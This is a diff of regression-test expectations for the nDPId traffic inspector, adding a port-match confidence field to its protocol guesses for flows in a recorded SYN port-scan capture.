 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -7038,13 +7038,13 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","ndpi": {"proto":"IMAPS","breed":"Safe","category":"Email"}}
+00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00594{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","ndpi": {"proto":"IMAPS","breed":"Safe","category":"Email"}}
+00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00592{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","ndpi": {"proto":"POPS","breed":"Safe","category":"Email"}}
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00593{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","ndpi": {"proto":"POPS","breed":"Safe","category":"Email"}}
+00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -7368,17 +7368,17 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","ndpi": {"proto":"SOCKS","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","ndpi": {"proto":"SOCKS","breed":"Acceptable","category":"Web"}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -7532,11 +7532,11 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","ndpi": {"proto":"Starcraft","breed":"Fun","category":"Game"}}
+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Starcraft","breed":"Fun","category":"Game"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
